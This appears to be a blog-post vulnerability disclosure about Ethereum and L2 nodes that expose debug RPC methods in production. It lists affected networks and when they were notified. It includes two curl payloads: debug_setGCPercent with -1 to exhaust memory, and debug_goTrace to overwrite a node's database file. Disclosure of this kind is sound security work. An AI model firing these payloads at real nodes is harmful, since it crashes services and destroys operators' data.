<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Misconfiguration of Ethereum RPC Series 1: RPC Debug Mode Enabled | Homepage</title>
    <meta name="generator" content="VuePress 1.9.10">
    <link rel="icon" href="/logo.png">
    <meta name="description" content="Zhiyuan Sun&#39;s personal website">
    
    <link rel="preload" href="/assets/css/0.styles.670d6f26.css" as="style"><link rel="preload" href="/assets/js/app.f6f9624e.js" as="script"><link rel="preload" href="/assets/js/2.9c3d16e9.js" as="script"><link rel="preload" href="/assets/js/1.ae13b9d5.js" as="script"><link rel="preload" href="/assets/js/27.aab4b633.js" as="script"><link rel="prefetch" href="/assets/js/10.348fa4ae.js"><link rel="prefetch" href="/assets/js/11.16c60823.js"><link rel="prefetch" href="/assets/js/12.47b93c21.js"><link rel="prefetch" href="/assets/js/13.8eab7d11.js"><link rel="prefetch" href="/assets/js/14.9b92e4b9.js"><link rel="prefetch" href="/assets/js/15.36c13836.js"><link rel="prefetch" href="/assets/js/16.47e1d84d.js"><link rel="prefetch" href="/assets/js/17.86a696ad.js"><link rel="prefetch" href="/assets/js/18.0498bdb0.js"><link rel="prefetch" href="/assets/js/19.a0bcf0af.js"><link rel="prefetch" href="/assets/js/20.706ac0ca.js"><link rel="prefetch" href="/assets/js/21.ba496146.js"><link rel="prefetch" href="/assets/js/22.fbed27a9.js"><link rel="prefetch" href="/assets/js/23.bff8b7a9.js"><link rel="prefetch" href="/assets/js/24.3ae7893f.js"><link rel="prefetch" href="/assets/js/25.f4a6ddb2.js"><link rel="prefetch" href="/assets/js/26.e2ff6647.js"><link rel="prefetch" href="/assets/js/28.014efb0f.js"><link rel="prefetch" href="/assets/js/29.8b8a1920.js"><link rel="prefetch" href="/assets/js/3.6df97c0a.js"><link rel="prefetch" href="/assets/js/4.ea9d8b6e.js"><link rel="prefetch" href="/assets/js/5.94969ca9.js"><link rel="prefetch" href="/assets/js/6.d433241e.js"><link rel="prefetch" href="/assets/js/7.ab403544.js"><link rel="prefetch" href="/assets/js/vendors~docsearch.b3213737.js">
    <link rel="stylesheet" href="/assets/css/0.styles.670d6f26.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container no-sidebar"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">Homepage</span></a> <div class="links"><!----> <nav class="nav-links can-hide"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav>  <!----> </aside> <main class="page"> <div class="theme-default-content content__default"><h1 id="misconfiguration-of-ethereum-rpc-series-1-rpc-debug-mode-enabled">Misconfiguration of Ethereum RPC Series 1: RPC Debug Mode Enabled</h1> <h2 id="vulnerability-details">Vulnerability Details</h2> <h3 id="description">Description</h3> <p>The RPC debug mode, designed for development purposes, is often unintentionally enabled in production environments. This exposes sensitive debug RPC methods that attackers can exploit to compromise blockchain nodes.</p> <h3 id="potential-exploits">Potential Exploits</h3> <ol><li><p><strong>Disabling Garbage Collection</strong><br>
Using the <code>debug_setGCPercent</code> method with a negative value, attackers can disable the garbage collector. This leads to rapid memory consumption, eventually crashing the node due to memory exhaustion.</p> <div class="language-bash extra-class"><pre class="language-bash"><code><span class="token function">curl</span> <span class="token parameter variable">--data</span> <span class="token string">'{&quot;method&quot;:&quot;debug_setGCPercent&quot;,&quot;params&quot;:[-1],&quot;id&quot;:1,&quot;jsonrpc&quot;:&quot;2.0&quot;}'</span> <span class="token parameter variable">-H</span> <span class="token string">&quot;Content-Type: application/json&quot;</span> <span class="token parameter variable">-X</span> POST http://localhost:8547
</code></pre></div></li> <li><p><strong>Overwriting Server Files</strong><br>
Exploiting the <code>debug_goTrace</code> method, attackers can overwrite arbitrary files on the server. For example:</p> <ul><li>Overwriting database files may corrupt critical data and crash the node.</li> <li>Overwriting system files may render the server inoperable.</li></ul> <div class="language-bash extra-class"><pre class="language-bash"><code><span class="token function">curl</span> <span class="token parameter variable">--data</span> <span class="token string">'{&quot;method&quot;:&quot;debug_goTrace&quot;,&quot;params&quot;:[&quot;~/.arbitrum/nitro/l2chaindata/000002.ldb&quot; ,1],&quot;id&quot;:1,&quot;jsonrpc&quot;:&quot;2.0&quot;}'</span> <span class="token parameter variable">-H</span> <span class="token string">&quot;Content-Type: application/json&quot;</span> <span class="token parameter variable">-X</span> POST http://localhost:8547
</code></pre></div></li></ol> <h2 id="impact">Impact</h2> <ul><li><strong>Node Crashes</strong>: Nodes can be forcefully terminated by exhausting memory resources.</li> <li><strong>Data Corruption</strong>: Essential server files, such as database or configuration files, can be irreversibly damaged, leading to potential data loss and extended downtime.</li></ul> <h2 id="affected-vendors">Affected Vendors</h2> <ul><li><strong>Scroll Testnet</strong>: Reported in <span style="color:blue;">December 2023</span>, but no response was received.</li> <li><strong>Boba Network Mainnet</strong>: Reported in <span style="color:blue;">March 2023</span> and confirmed as <span style="color:red;">low severity</span>.</li> <li><strong>Oasys Testnet</strong>: Reported in <span style="color:blue;">March 2023</span>, but no response was received.</li> <li><strong>Arbitrum Mainnet</strong>: Reported in <span style="color:blue;">October 2022</span> and confirmed as <span style="color:red;">high severity</span>.</li></ul></div> <footer class="page-edit"><!----> <!----></footer> <!----> </main></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f6f9624e.js" defer></script><script src="/assets/js/2.9c3d16e9.js" defer></script><script src="/assets/js/1.ae13b9d5.js" defer></script><script src="/assets/js/27.aab4b633.js" defer></script>
  </body>
</html>
